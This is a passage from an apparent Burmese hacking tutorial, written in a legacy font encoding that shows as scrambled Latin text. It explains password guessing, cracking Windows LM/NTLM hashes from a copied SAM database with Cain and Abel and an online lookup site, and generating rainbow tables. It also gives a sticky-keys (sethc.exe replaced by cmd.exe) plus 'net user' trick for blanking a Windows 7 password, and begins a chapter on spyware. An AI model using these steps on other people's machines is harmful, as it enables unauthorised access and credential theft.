aemufwpfcku arG;aeYudkvnf; password tjzpf xm;avh&SdMuygw,f/ 'gayr,fh
txufrSm Oyrm ay;cJhwJh atmifatmifudk Munfh&if 4.1.1990 qdkawmh dot (.) om
xnfhwGuf&if 411990 om jzpfvdkY Facebook vdk tenf;qHk; password 8vHk;
xm;&wJh pepfawGrSm dot or zero yHkpHeJY oHk;avh&Sdygw,f/ Oyrmajym&&if
atmifatmif&JU arG;aeYu January 4, 1990 jzpfwmaMumifh
1.4.1990
01041990
010490
1490
141990
pwmawGudk toHk;jyKEdkifygw,f/ oHk;wJhyHkpHuawmh trsdK;rsdK;
jzpfygvdrfhr,f/ Facebook vdk tenf;qHk; 8 vHk; uae txuf om xm;&r,fh
ae&mrsdK;rSmawmh 8vHk;ausmfwJh yHkpHudk oHk;Edkifovdk yxraqG;aEG;cJhtwdkif;
emrnfeJYvnf; wGJoHk;csifoHk;ygr,f/ PIN eHygwfeJY oHk;wJhae&mrsdK;awGrSmawmh 4vHk;
odkYr[kwf 6 vHk; oHk;wmrsm;wJhtwGuf txufygyHkpHawGeJY oHk;avh&SdMuwmyg/
rSwfyHkwif eHygwf 6 vHk;udkvnf; oHk;avh&SdwwfMuygao;w,f/
aemufwpfcsuf password guess EdkifzdkY xnfhpOf;pm;oifhwmuawmh
Emotional word/s (or) Phrase yg/ pdwfcHpm;rIawGudkvnf; uRefawmfwdkY
oHk;avh&SdMuygw,f/ Oyrm - iloveyou, ilove(name), ilove(name)1500, *1500#,
ihate(name),... ponfjzifh pdwfcHpm;rIawGudkvnf; oHk;avh &SdMuygw,f/
'Dae&mrSm ]]Password Guessing vkyfzdkYtwGufudk tcsdefawGay;jyD; list awG xkwfzdkY
vdkwmaygh/ password trSef &csifrSvnf; &rSm tcsdefawG rukefbl;vm;}} vdkY
ar;aumif; ar;csifygvdrhfr,f/ [kwfuJh/ Hacking jyKvkyf&mrSm enf;ynm omru
tcsdefeJY ZGJ+ pdwftm;xufoefrIawGudkyg &if;ESD;&ygw,f/
Password Guessing vkyfwJh tool awGvnf; &Sdaeygao;w,f/
TSgrinder eJY cupp wdkY[m toHk;rsm;wJh Password Guessing Tool awGygyJ/
'gawGudkawmh Wordlist Creation tcef;rSm azmfjyaqG;aEG; oGm;ygr,f/ vufawGY
rSmvnf; company (or) organization level awGrSm toHk;jyK&wJh uGefysLwm
ta&twGufawG rsm;vmwmeJYtrQ repairing tydkif;awG ydkrdk vdktyfvmwmaMumifh
administrator password udk IT team (or) Computer Specialist u rSwfrd
od&SdEdkifr,fh password awGudk toHk;jyKaeMuwmudk awGY&ygr,f/ 'gawGuawmh
password guessing vkyfEdkifzdkY vG,fulapwJh t&mawGaygh/ rdrdwdkY&JU vkyfief;cGifrSm
safe jzpfzdkYtwGufvnf; tqdkyg cefYrSef;EdkifwJh password rsdK;awG rjzpfatmif
owd&SdzdkY vdktyfygr,f/ Oyrm - bmvmvm'gyJ vdkrsdK;qdk vG,fuljyD; cefYrSef;&cuf
ygw,f/ (rSwfrdvG,fzdkUuawmh jrefrmvdk rSwfxm;wmyg/ jrefrmpm &dkufwJhae&mrSm
txufygtwdkif; &dkufMunfhMunfhaygh/)
Password Hashing & Encryption

'Dtydkif;rSmawmh t"dutm;jzifh hash awGtaMumif;om

aqG;aEG;oGm;ygr,f/ uRefawmfwdkY avhvmMur,fh Windows OS awGrSm password
storing vkyf&mrSm method ESpfrsdK;udk t"du toHk;jyKwm awGY&rSmyg/ Old method
uawmh LAN Manager vdkYac:wJh LM hash jzpfygw,f/ trsm;qHk;twdkif;twm
14 characters om odrf;xm;EdkifjyD; tvG,fwul crack Edkifygw,f/ 'gaMumifh
Windows Vista uae aemufydkif; Windows awGrSm LM hash udk toHk;rjyKawmh
ygbl;/
LM hash rSmu 14 character udk tydkif; ESpfydkif;tjzpf ydkif;jcm;odrf;qnf;
ygw,f/ 14 vHk;txdyJ vufcHwmqdkawmh 7vHk;pD ESpfydkif;aygh/ tJonf tydkif;ESpfydkif;
udk oD;jcm;pD encrypt vkyfayr,fh hash tjzpf xm;wJhae&mrSmawmh ESpfckvHk;udk
twlaygif;jyD; single hash tjzpf xm;&Sdwm jzpfygw,f/ 'gaMumifh tpkwpfpkvHk;udk
crack zdkY vG,fuloGm;wmyg/ 'guawmh Old Version jzpfwJh LM hash aygh/
'gqdk uRefawmfwdkY ck oHk;aewJh New Method u bmvJ/ Windows Vista
uae aemufydkif;awGrSm LM hash udk disabled vkyfjyD; tjcm; method udk
toHk;jyKygw,f/ bmudkvJqdkawmh maximum 127vHk;xd rSwfxm;EdkifwJh NT hash
yg/ uRefawmfwdkY ,aeY oHk;aewm LM hash qdkayr,fh (uRefawmfh q&mawG
penetration test jyKvkyfay;cJh&wJh) tcsdKUaom bPfvdk organization rsdK;awGrSm
system wdkif;eJY compatibility jzpfatmifvdkYqdkjyD; LM hash tpm; NT hash udkom
oHk;aeqJ vdkY od&ygw,f/
uRefawmfwdkY vkyfief;awGrSm toHk;rsm;qHk;jzpfwJh Windows OS awGonf
password awGudk b,fae&mrSm odrf;ygovJ/ SAM database xJrSm odrf;ygw,f/
Active Directory server rSmawmh password udk AD database rSm
odrf;qnf;ygw,f/ 'D database awG aumfyDul;oGm;cH&wJhtcg or
cdk;,lcHvdkuf&wJhtcg rSmawmh password awGaygufMum;oGm;rSm jzpfygw,f/ SAM
database udk ul;,ljyD; John the Ripper vdk? Cain and Able vdk tool awGudk
toHk;jyKjyD; jyefjznfxkwfEdkifrSmrdkYvdkYygyJ/
'Denf;vrf;udk toHk;jyKjyD; password arhaewJh pm&Iol&JU oli,fcsif;awGudk
Windows jyefrwif&apbJeJY tqifajyoGm;atmif ulnDEdkifygao;w,f/
b,fvdkvkyf&rvJ qdk&ifawmh SAM database udk Kali Live Mode eJY 0ifjyD; ul;,l
jyD;&if pm&Iol&JU pufrSm Cane and Able vdk tool awGeJY jyefjyD; azmfMunfhvdkY
&wmaygh/ Cane and Able udk b,fvdkoHk;&rvJ qdkwm qufjyD; aqG;aEG;ygr,f/
Cain and Able
oHk;&vnf;vG,fjyD; aumif;rGefwJh cracking tool wpfckudk jyygqdk&ifawmh
Cain and Able udk jy&ygr,f/ 'DpmtkyfxJu app awGudk bit.ly/kmn-app rSm
pkay;xm;vdkY a'gif;,lEdkifrSmjzpfygw,f/

Cain and Able udk zGifhjyD; cracker qdkwJh option udk zGifhMunfh&if
txufyg yHktwdkif; jrifawGY&ygr,f/
 yxrqHk; cracker atmufu LM & NTLM Hashes qdkwJh ae&mav; udk
click jyD; select vdkufyg/ yHkrSm 1 vdkY jyxm;ygw,f/ jyD;&if 3 qdkwJhae&mrSm
tjyma&mif taygif;vu©Pmav; raygbJ rSdefae&if 2 vdkY jyxm;wJh user name
atmufu tjzLuGufrSm click vdkufwmeJY tjyma&mif taygif;av; ay:vmygr,f/
yHkxJutwdkif;yJ 3 vdkY jyxm;wJhae&mrSm tjyma&mif taygif;av; ay:vmwmudk
ESdyfvdkufyg/

txufygyHktwdkif; Add NT Hashes from qdkwJh option box av;

ay:vmygr,f/ default twdkif; bmrS ra&G;bJ Next &if vuf&Sd uGefysLwmrSm &SdwJh
user awGudk &SmazG jznfhoGif;ay;rSmjzpfjyD; import hashes from a test file
qdkwmuawmh .txt zdkifu Hash awGudk azmfMunfhvdkwJhtcg oHk;&rSm jzpfygw,f/
SAM Database udk ul;vmwJhzdkifudk jznfcsif&ifawmh wwd, option jzpfwJh Import
Hashes from a SAM database udk a&G;&ygr,f/ ckawmh default twdkif;yJ jyygr,f/
SAM database udk ul;jyD;oGm;&if rdrdbmom jznf&vG,fygw,f/
uRefawmfu ck vuf&SdrSm uRefawmfoHk;jyr,fh puf&JU Account awGudkyJ
erlem jyoGm;yghr,f/ 'gaMumifh bmrS a&G;p&mrvdkbJ olay;xm;wJh tay:qHk;
option twdkif;uae next vdkuf&HkygyJ/
 LM hash eJY NT Hash column awGudk csJUMunfhEdkifygw,f/

LM Hash awGonf tm;vHk; wlnDaewmudk awGY&ygr,f/ uRefawmf

oHk;jywm Windows 7 rSmjzpfjyD; Vista uae aemufydkif; Windows awGrSm LM
Hash udk roHk;awmhbl;vdkY BudKaqG;aEG;xm;wm rSwfrdOD;r,fxifygw,f/

'guawmh uRefawmfhuGefysLwmrSm vuf&Sd &SdaewJh user account awGyg/

tJonfrSm Munfh&if Administrator Account name u root vdkY ay;xm;wJh
account jzpfwmudk awGY&ygr,f/ usefwmawGuawmh standard user awGom
jzpfMujyD; Guest Account udk Off xm;wm awGYEdkifygw,f/

'guawmh uRefawmfh Windows system user account awGudk Cain and

Able (CA) rSm jrif&wmudk teD;uyf jyxm;wmyg/ Administrator Account onf
root qdkwJh emrnfeJYqdkwm a&SUyHkrSm awGYcJhjyD;jyDaemf/ 'DrSmawmh wpfckpDtjzpf
jyxm;ayr,fh twlwlyJqdkwm rSwfxm;&ygr,f/ Windows 7 jzpfvdkY LM Hash udk
roHk;awmhwJhtwGuf LM password qdkwJhatmufrSm empty vdkY jyaeygw,f/
password oHk;rxm;bl;aygh/ NT password atmufrSmawmh root qdkwJh
administrator account eJY guest account u empty (no password) yg/ usefwJh
Account oHk;ckjzpfwJh KMN, Test1 & Test2 qdkwJh Account awGrSmawmh Password
awG &Sdaewmudk awGY&ygr,f/

Password azmfzdkYtwGuf Right click vkyfMunfhtwJhtcg Dictionary

Attack, Brute-Force Attack eJY Cryptanalysis Attack qdkjyD; a&G;p&m oHk;ck
awGY&ygr,f/ wpfckpDrSmvnf; xyfa&G;p&mawG &Sdaeygao;w,f/

Dictionary Attack twGufyg/

'guawmh Brute-Force Attack rSm yg0ifwmjzpfjyD; xyfa&G;p&mawGu

wlnDaewmudk awGYjrif&rSmyg/

Cryptanalysis Attack rSmawmh xyfrHa&G;cs,fp&mawG ydkrsm;vmjyD;

Rainbow Tables awGwnfaqmufjyD; crack wJhtydkif;awGyg yg0ifvmwmudk
awGU&rSmyg/
 Cryptanalysis Attack rSm NTLM Hashes twGufawmh OphCrack eJY
RainbowCrack qdkwJh Rainbow Table toHk;jyKrI ESpfrsdK;yJ yg0ifwm awGY&ygr,f/ ck
erlem vkyfaqmifjyrSmu Brute-Force xJu NTLM Hash udk a&G;cs,fvdkufyg/

Predefined taeeJY a&G;cs,fp&mawG rsm;pGm awGY&rSmyg/ a-z eJY

udef;awGvm;? a-z, A-Z & numbers vm;? a-z & special characters
(*&^%$#@!....) awGvm;? ponf ponfjzifh a&G;p&mawG rsm;ygw,f/
uRefawmfuawmh wwd, wpfckeJY erlem jyygr,f/ uRefawmf prf;oHk;xm;wJh
Password xJrSm pmvHk;tBuD; rygvdkY xnfhra&G;xm;wmyg/ 'Denf;u aocsmw,f
qdkayr,fh tcsdefuawmh ay;xm;wJh password ay: rlwnfjyD; tvGef
MumEdkifygw,f/
txufyg Brute-Force attack box rSm nmbuf tay:axmifhrSm Min
qdkwmu uRefawmfwdkY poHk;r,fh tenf;qHk; Password ta&twGufyg/ (tcsddKUu a
qdkjyD; wpfvHk;wnf;awmif xm;wwfygw,f)/ tJonfae&mrSm tenf;qHk;eJY
trsm;qHk; ta&twGufawGudk owfrSwfay;&ygr,f/ jyD;&ifawmh Start udkESdyfjyD;
pwif wdkufqdkifvdkY &ygjyD/
 'DyHkuawmh (uRefawmf erlem vkyfjyxm;wJhtwdkif;) wdkufqdkifppfaq;
aejyD jzpfygw,f/ (wpfckpD vkyf&rSmjzpfygw,f)

PasswordawG tm;vHk; &vm&ifawmh NT Password qdkwJh column

atmufrSm vmjyay;rSm jzpfygw,f/ Column udk csJUMunfhvdkY &ygw,f/
 uRefawmfwdkYu ul;,l&&SdvmwJh SAM database xJu Account awG&JU
Password udk vdkcsifwm qdk&ifawmh yxrqHk;tqifhrSm txufyg yHkxJutwdkif;
click jyD; SAM database udk a&G;cs,fEdkif&rSmjzpfygw,f/ usefwmuawmh twlwlyJ
rdkYvdkY xyfjyD; razmfjyawmhygbl;aemf/ Brute-Force vkyf&mrSm tcsdef MumjrifhrIonf
password &JU cufcJrI? pmvHk;a& rsm;rIawGay:vnf; rlwnfovdk uGefysLwm&JU
pGrf;aqmif&nfay:vnf; rlwnfygw,f/ Super Computer awGrSmuawmh
tcsdefukefydkjyD; oufomygw,fcifAs/
tcsdKUaom cracking tool awGonf password udk vsifjrefpGm crack
EdkifwmaMumifh Microsoft u ydkjyD; vHkjcHKrI&SdwJh pepfudk ajymif;vJ cJhygw,f/
Windows NT 4 Service Pack3 uae pjyD;awmh Security rSm SysKey udk
xnfhoGif;cJhygw,f/ SAM database xJudk 128bit encryption udk xyfavmif;
tm;jznfhvdkufwmyg/ vkyfaqmif&wJh &nf&G,fcsufu SAM database udk Hacker
awGu cdk;,l&&SdcJh&ifawmif SysKey rygbJ zGifhMunfhvdkY r&apzdkY jzpfygw,f/
Hacker awGuvnf; SAM database udk decrypt jyefvkyfEdkifzdkYta&;twGuf
BKhive vdk tool awGudk xyfrH wDxGifvdkufjyefygw,f/ Cain and Able onfvnf;
wpfck tygt0if jzpfygw,f/
ydkaumif;wJh Mitigation technique wpfckudk ajym&r,fqdk&ifawmh
SysKey udk Local system rSm rxm;bJ tjcm;ae&mrSm a&TUxm;EdkifzdkY jzpfygw,f/
'gayr,fh a&TUxm;EdkifwJh wpfckwnf;aom ae&mu Floppy Disk jzpfaewmaMumifh
('DaeYacwfrSm b,folrS roHk;wJhtwGuf) t&mrxifygbl;/ Microsoft
uvnf; ,aeYxd update rvkyfao;ygbl;/ USB vdk ae&mrsdK;awGrSm a&TUxm;Edkif&if
awmh ydkjyD; aumif;r,fvdkY arQmfvifh&ygw,f/
uRefawmfwdkY aqG;aEG;cJhMuwJh Cane and Able uae &vmwJh NT Hash
awGudk online uae wdkufqdkif ppfaq;EdkifwJh ae&mwpfck &Sdygao;w,f/ olYqDrSm
&SdjyD;om; database awGeJY wdkufqdkifppfaq;wm jzpfvdkY uRefawmfwdkY&JU Victim u
ay;xm;wJh password awGonf tqdkygae&mrSm &SdaecJh&if tvGefvsifjrefpGm
&&,lEdkifrSmjzpfygw,f/ vkyfaqmifMunfhzdkYtwGufawmh Cane and Able udk zGifhyg/
 jyD;&if yxrtwdkif; user account awG ay:vmwJhtxd qufvkyfyg/
tay:rSm aqG;aEG;cJhjyD;jyDrdkY tus,f rajymawmhbl;aemf/ jyD;&ifawmh Right click
ESdyfjyD; Export udk a&G;&ygr,f/ odkYr[kwf NT Hash awGudk MunfhjyD;
tjcm;zdkifwpfzdkifrSm &dkufxnfhvnf; &ygw,f/ export vkyfwmuawmh ydkjrefwmaygh/

zdkifudk odrf;r,fhae&mudk rdrdbmom a&G;cs,fjyD; zdkifemrnfay;um

odrf;xm;Edkifygw,f/ uRefawmfuawmh Desktop ay:rSmyJ xm;xm;ygr,f/
jyD;&ifawmh rdrdodrf;xm;wJhzdkifudk notepad eJY zGifhMunfhyg/ Kali rSmqdk&ifawmh
Leafpad (or) Gedit wdkYeJY zGifhEdkifygw,f/ tJonfrSm user account awG&JU hash
awGudk awGYjrif&ygr,f/ hash awGudk : jcm;jyD; azmfjyxm;wmudk awGY&rSmjzpfjyD; ]];}}
&JU aemufydkif;u NT Hash jzpfygw,f/

aemufutydkif;udk aumfyD,laygh/

jyD;&if Browser rSm hashkiller.co.uk vdkY &dkufjyD; oGm;vdkufyg/

 ay:vmwJh site rSm &SdaewJh Decrypter/Cracker qdkwJh tab uae NTLM
Hash udk a&G;cs,fvdkuf&ygr,f/ (uRefawmfwdkYoHk;rSmu NTLM Hash twGufrdkYyg/
tu,fí MD5 twGuf wdkufqdkifMunfhvdkyguvnf; MD5 rSm MunfhEdkifygw,f/)

ckeu ul;,lxm;wJh hash awGudk txufygyHkxJutwdkif; NTLM hashes

ae&mrSm paste vdkufyg/ jyD;&ifawmh page atmufqHk;em;udk oGm;jyD; Captcha udk
rSefatmifjznfh&ygr,f/

ay;xm;wJh captcha rSefatmifjznfhjyD; Submit udk ESdyfvdkufyg/

uRefawmfwdkY &Smr,fh Hash onf site database rSm &SdaejyD; jzpfygu

txufygtwdkif; awGYjrif&ygr,f/ Status rSm we found 1 hashes qdkjyD;
tpdrf;a&mif pmwef;av; awGY&rSmjzpfygw,f/

nmbufjcrf;rSmawmh uRefawmfwdkY &SmazGvdkufwJh NTLM Hash &JU

tajzudk awGYjrif&ygr,f/ ck uRefawmf erlem jyxm;wmuawmh hash u
7259353E59427CE240391DB8893DA4E0 jzpfjyD; tajzu khitminnyo qdkjyD;
jzpfygw,f/ erlem &SmjywJh user account u KMN jzpfwmrdkYvdkY tqdkyg
uGefysLwmxJu KMN qdkwJh user account xJudk khitminnyo (password) eJY
0ifEdkifjyD jzpfygw,f/

txufygtwdkif; status rSm Failed to find any hashes! vdkY jycJhr,f

qdk&ifawmh uRefawmfwdkY &SmazGvdkwJh hash onf hashkiller rSm r&Sdao;bl;vdkY
qdkvdkygw,f/ 'Davmufqdk oabmaygufavmufjyDvdkY xifygw,f/ a&SU
quf&atmifyg/

Windows 7 User Account without Passwords

wu,fwrf;u 'DtaMumif;udk raqG;aEG;cif tjcm; aqG;aEG;oifhwmawG
tawmfrsm;rsm; &Sdaeygw,f/ 'gaMumifh 'D Chapter atmufrSm aqG;aEG;wJh
taMumif;t&mawGudk 'Dtcef;eJY oufqdkifwm ukefjyDvdkYawmh rowfrSwfygeJY vdkY
BudKwif yefMum;xm;yg&apAsm/
uRefawmfwdkYtaeeJY Windows 7 uGefysLwmwpfvHk;udk & xm;w,f/
zGifh0ifzdkYvnf; rjzpfrae vdktyfaejyD; zGifh0ifzdkY Password vnf; rodbl; qdkygpdkY/
(Password arhaewmvnf; twlwlyJaygh)/ uRefawmfwdkYrSm tjcm; uGefysLwm vnf;
&SdjyD; Hard Disk udk jzKwfum external tjzpf oHk;Edkifr,fh tydkypönf;awGnf; &Sdw,f
qdk&ifawmh tvG,fulqHk;enf;vrf;u HDD udkjzKwf external tjzpf zefwD;jyD;
tjcm;uGefysLwmrSm wyf? txJu Data awGudk ul;,l ponfjzifh vkyfvdkY &ayr,fh
tjcm;uGefysLwm r&SdaewJhtajctaerSmawmh zGifh0ifvdkY &zdkYu rjzpfrae vdktyfvm
ygw,f/
 txufyg yHkuawmh uRefawmf erlemtaeeJY 0ifjyay;r,fh Windows
Computer u user account jzpfygw,f/ Hack Me vdkY emrnfay;xm;jyD; password
xm;xm;wmudk awGY&rSmyg/ password rodbJeJY 0ifa&mufEdkifzdkYtwGuf uawmh
startup repair ay:wJhxd vkyfaqmif&rSm jzpfygw,f/ Desktop computer
awGrSmawmh restart switch ygwJhtwGuf tJ'Duae vkyfaqmifEdkifrSmjzpfjyD; Laptop
tcsdKUrSmawmh Login 0ifwJhae&ma&muf&if yg0gcvkwfudk MumMumzdydwfjyefzGifh
login ae&mjyefa&muf&if MumMumzdjyD;jyefydwf Launch Startup Repair ay:wJhxd
vkyfaqmif&rSmyg/ tcsdKUuGefysLwmawGrSmawmh F8 udk cyfjrefjref tBudrfBudrf
zdESdyfay;jcif;jzifh 0ifa&mufEdkifygw,f/

txufygtwdkif; 0ifa&mufzdkY tcuftcJ&SdjyDqdk&ifawmh Windows 7

installer Disc vdktyfygw,f/

acGxnfhjyD; yHkrSeftwdkif; qufoGm;/ Install now udkrESdyfbJ Repair your

computer qdkwJhae&mav;udk ESdyfjyD; startup repair udk 0ifa&mufEdkifygw,f/

txufygtwdkif; system recovery options uaevnf;

oGm;a&muf&wwfygw,f/

txufygtwdkif; View problem details udk qufvuf 0ifa&muf

&ygr,f/ atmufygyHkxJu jrm;jyxm;wJh pmwef;av;udk awG&Y ygr,f/
 jrm;jyxm;wJh Link udk ESdyfvdkufr,fqdk&ifawmh

yGifhvmr,fh Notepad uae File >> Open vkyf&ygr,f/ 'gqdk&ifawmh

File explorer ay:vmrSmjzpfjyD; tJonfuae Windows >> System32 xJudk
qufvuf 0ifa&muf&ygr,f/

yHkxJutwdkif;yJ system32 folder xJrSm sethc qdkwJhzdkifudk &SmazGjyD;

R-click eJY rename vkyfum sethc1 vdkY emrnfajymif;vdkufyg/
(rdrdESpfouf&majymif;Edkifygw,f/ uRefawmfuawmh jyef&Sm&vG,fatmif one
xyfxnfhvdkufwmyg/)
 jyD;&if tJonf system32 folder xJrSmyJ cmd qdkwJhzdkifudk &Smyg/ copy &
paste vkyfjyD; &vmwJh zdkifudk sethc vdkY emrnfay;vdkufyg/ (file extension awG
azmfxm;&ifawmh cmd.exe qdkwmudk awGY&rSmjzpfjyD; copy ,lvdkufwJhzdkifemrnfudk
sethc.exe vdkY ajymif;&ygr,f/ cmd vdkYyJ awGY&ifawmh ul;,lvdkufwJhzdkifudk sethc
vdkYyJ xm;&rSmyg/) tm;vHk;jyD;wJhtcg X udkESdyfjyD; exit vdkufyg/ jyD;&if uGefysLwmudk
restart vkyf&ygr,f/ uGefysLwm jyefyGifhvmjyD; yHkrSeftwdkif; Login 0ifwJhae&mudk
a&mufygr,f/

Login 0ifwJhae&ma&mufwJhtcg Keyboard uae Shift key udk

cyfjrefjref ig;csuf ESdyf&ygr,f/
 ay:vmwJh command prompt rSm net user vdkY &dkufxnfhvdkuf&if vuf&Sd
zGifhxm;wJh user account awGudk awGYjrif&ygr,f/

uRefawmf erlemjyr,fh uGefysLwmrSmawmh txufygyHktwdkif; jrif&rSmyg/

Administrator qdkwmu tJonfemrnfeJY Account zGifhavh&SdrSom toHk;jyK&rSmjzpf
jyD; uRefawmfh uGefysLwmrSmawmh root qdkwJhemrnfeJY account onf administrator
account qdkwm tay:rSm azmfjycJhjyD;jyDaemf/ tck uRefawmfu Hack Me qdkwJh
account udk 0ifygr,f/

toHk;jyK&r,fh command u net user AccName * jzpfygw,f/

uRefawmf erlemjyr,fh account name u Hack Me qdkwJh space jcm;wJhemrnf
jzpfvdkY "Hack Me" vdkY rsufawmiftzGifhtydwfxJ xnfha&;jyxm;jcif; jzpfygw,f/
tu,fí root qdkwJh account udk 0ifjyifcsif&ifawmh net user root * vdkYyJ
a&;&rSmjzpfygw,f/ enter vdkufwJhtcgrSmawmh Type a password for the user:
qdkwJh pmaMumif; ay:vmrSmyg/ bmrSrjznfhbJ enter vdkufr,fqdk&ifawmh Hack Me
qdkwJh account (uRefawmfwdkY 0ifa&mufvdkwJh account ) rSm password jyKwfoGm;jyD
jzpfygw,f/ 0ifvdkY &jyDaygh/ :)

uRefawmfhtaeeJY aqG;aEG;vdkwmuawmh uRefawmfwdkYrSm Kali Linux

Live Mode USB wpfacsmif;om &Sd&if txufygenf;awGtwdkif;
azmuf0ifaep&mawmif rvdkygbl;/ xdk uGefysLwmrSm usb wyf? Live Mode eJY
0ifa&mufjyD; vkdtyfwJh tcsuftvufawGudk ,lxkwfEdkifygw,f/ uRefawmfwdkY
udk,fydkifuGefysLwm r[kwfwJhtcg Password vnf;rod? txJrSmvnf; rjzpfrae
ul;,l&r,fhzdkif &Sdaew,fqdkwJhtcgawGrSm (ydkif&SifeJY tquftoG,fr&wJh
tcsdefrsdK;rSmaygh) Live Mode eJY zdkifawG0if,lEdkifwmaMumifh uRefawmfwdkY vdkcsifwm
vnf; &? ydkif&Sif&JU user account information awGvnf; ysufroGm;? password
udkvnf; tcsdefay;jyD; crack aep&m rvdkawmhbl;aygh/

Creating Rainbow Tables on Windows

'Dcgawmh Windows rSm rainbow table awG wnfaqmufenf;udk aqG;aEG;
&atmifyg/ Cain and Able rSmwkef;u Password awGudk crack &mrSm rainbow
table awGudkvnf; toHk;jyKEdkifwm owdxm;rdrSmyg/ Password List awGudk
toHk;jyKjyD; crack vkyfjyxm;ygw,f/ rainbow table awGeJY crack wmuvnf;
vkyfenf; twlwlygyJ/ Rainbow table awGudk BudKwif wnfaqmufxm;Edkifygw,f/
Word list zdkifawGudkvnf; BudKwifzefwD;xm;Edkifayr,fh Wordlist &JU
tm;enf;csufu ydkjyD;jynfhpHkvmavav zdkifqdk'f ydkjyD; BuD;vmavavyg/
pmvHk;a&rsm;avav size ydkBuD;vmavavrdkYvdkY uRefawmfwdkY&JU
uGefysLwmxJrSm odrf;qnf;zdkY rjzpfEdkifawmhwJhxd jzpfvmEdkifygw,f/

txufyg yHkrSm password 8 vHk;uae 20 txd tjynfhtpHkudk

xkwfr,fqdk&if jzpfvmr,fh size udk jrifawGY&rSmyg/ (Kali Linux rSm crunch
command udk toHk;jyKjyD; word list awGudk zefwD;Edkifygw,f/) txufygtwdkif;
size BuD;wJhzdkifawGudk odrf;qnf;zdkY uRefawmfwdkY&JU uGefysLwmrSm rjzpfEdkifygbl;/
'gaMumifh 'DtajctaersdK; (uRefawmfwdkY oHk;aewJh wordlist rSm victim &JU
Password rygcJhwJh tajctaersdK;rSm) jynfhpHkwJh word awGudk ae&musOf;usOf;eJY
&EdkifzdkYtwGuf rainbow table awGudk toHk;jyKEdkifygw,f/
Windows rSm Rainbow Table awG zefwD;Mu&atmif/ uRefawmfwdkY
install cJhwJh Cain and Able rSm install pOfu xyfrH jznfhoGif;oGm;cJhwJh Program
wpfck yg0ifygw,f/ Windows Rainbow Table Generator yg/ winrtgen qdkwJh
emrnftwdkaumufeJYaygh/ start menu >> search uae &SmMunfhEdkifygw,f/
winrtgen udk zGifhygr,f/
jyD;&if Add Table uae topf zefwD;ygr,f/

jyD;&if Hash rSm rdrdwdkY toHk;jyKrnfh hash udka&G; Min Len u tenf;qHk;
pmvHk;a&? Max Len uawmh trsm;qHk; pmvHk;a& jzpfygw,f/ Charset (Character
Set) rSm rdrdwdkY vdkcsifwJhtwdkif; pmvHk;tao;? pmvHk;tBuD;? udef;awG special
character awG ygwm rygwmawG rdrdwdkYpdwfBudKuf a&G;cs,fEdkifygw,f/
uRefawmfuawmh all-space (default) twdkif;yJ xm;xm;ygw,f/ tm;vHk;
ygapcsifvdkYyg/ jyD;awmhatmufrSm ay:vmr,fh Disk space udk MunfhMunfhyg/
uRefawmf cke wordlist rSmwkef;uvnf; 8-20 yg/ ck Rainbow table rSmvnf; 8-20
ygyJ/ zdkifqkd'fuawmh tawmfhudk uGmjcm;oGm;ygjyD/ Disk space 610,35 MB vdkY
awGYjrif&rSmyg/ OK >> OK vdkufyg/

txufygtwdkif; rainbow table zefwD;aewmudk awGYjrif&ygr,f/

tcsdefawmh apmifhay;&ygr,fcifAs/

Kali Linux rSm rainbow table awG zefwD;vdkygvsifawmh rainbowcrack

(rtgen) eJY zefwD;EdkifrSmjzpfygw,f/ wu,fwrf; aqG;aEG;r,fqdk&ifawmh trsm;BuD;
aqG;aEG;p&m usefygao;w,fcifAs/ 'gayr,fh ckawmh 'Dae&mav;rSmyJ acwå&yfem;
yg&apcifAsm/
CHAPTER 18: Spyware and Keyloggers

Introduction

spyware awGeJY keylogger awGudk hacker awGu information

awGpkaqmif;EdkifzdkYtwGuf toHk;jyKcJhMuwm MumcJhygjyD/ ,aeYacwfrSmvnf;yJ
toHk;jyKaeMuqJygyJ/ 'Dtcef;rSmawmh wwfEdkiforQ jynfhpHkatmif aqG;aEG;oGm;zdkY
pdwful;xm;ygw,f/ 'gaMumifh pmtenf;i,fydkzwf&r,f qdkwmav; BudKwif
yefMum;xm;yg&apcifAsm/
Spyware qdkwm bmvJ/ spyware qdkwmu stealth mode taeeJY
(udk,fa&mifazsmuf vIyf&Sm;Edkif) run EdkifwJh software (program) wpfrsdK;yg/
aemufuG,fuae vkyfaqmifwmjzpfvdkY uRefawmfwdkY&JU uGefysLwmpepfrSm spyware
awG &Sdae raeqdkwmudk od&SdEdkifzdkY cufygw,f/ Spyware awGudk spybot (or)
tracking software awGvdkYvnf; ac:qdkMuygao;w,f/ uRefawmfwdkY
uGefysLwmxJrSm &SdaewJh information awGeJY uRefawmfwdkY uGefysLwm zGifhpOfrSm
xnfhoGif;toHk;jyKcJhMuwJh tcsuftvufawG pwJh sensitive information awGudk
rSwfwrf;jyK pkaqmif;EdkifzdkYtwGuf spyware awGudk toHk;jyKMuwm jzpfygw,f/
uRefawmfwdkYawG Login 0ifa&muf&mrSm toHk;jyK&dkufoGif;cJhwJh passwords
awG? user name (or) email pwJh Keystroke awGudk log vkyfjyD; rSwfom;EdkifzdkY
twGufvnf; spyware awGudk toHk;jyKEdkifygw,f/ Gmail, Yahoo mail, Facebook
pwJh t"du site awGtwGuf a&G;cs,frSwfom;Edkifovdk web page login
tm;vHk;twGuf rSwfom;Edkifatmifvnf; program a&;qGJxm;Edkifygw,f/
enf;ynmawG wdk;wufvmwmeJYtrQ tifwmeufuae vkyfaqmifEdkifwJh
i-Banking vdk 0efaqmifrIrsdK;udk toHk;jyKae&wJh vkyfief;BuD;awGtwGufawmh 'g[m
txl;owdxm;p&m tcsufwpfck jzpfvmygawmhw,f/
Spyware awG[m aps;oufomwJh private investigator awGvdk
tm;udk;&ygw,f/ tu,fí uRefawmfwdkY&JU uGefysLwmrSm Screen Capture
vkyfEdkifwJh software wpfckck install xm;wm &Sdr,fqdk&if Spyware u xdk software
eJY aygif;pyfjyD; uRefawmfwdkY&JU vkyfaqmifcsufawGudk screenshot taeeJY rSwfjyK
odrf;xm;EdkifrSmjzpfovdk spyware owner xH ydkYaqmifay;wmrsdK;vnf;
vkyfaqmifEdkifrSmjzpfygw,f/ uRefawmfwdkY uGefysLwmawGrSm web cam awGom
wyfqif^yg&Sd r,f qdkygvsifawmh spyware onf tqdkyg web cam udk toHk;jyKjyD;
camera record awGyg &,loGm;Edkifygw,f/
w&m;0if tracking software awGeJY spyware awGMum;rSm
jcm;em;csufwpfck &Sdygw,f/ tJ'gu bmvJqdk&if Legitimate Tracking software
(w&m;0if software) awGuawmh uRefawmfwdkY&JU udk,fydkiftodeJY udk,fwdkif install
jyKvkyfMu&wm jzpfjyD;awmh spyware awGuawmh uRefawmfwdkY rodapbJ
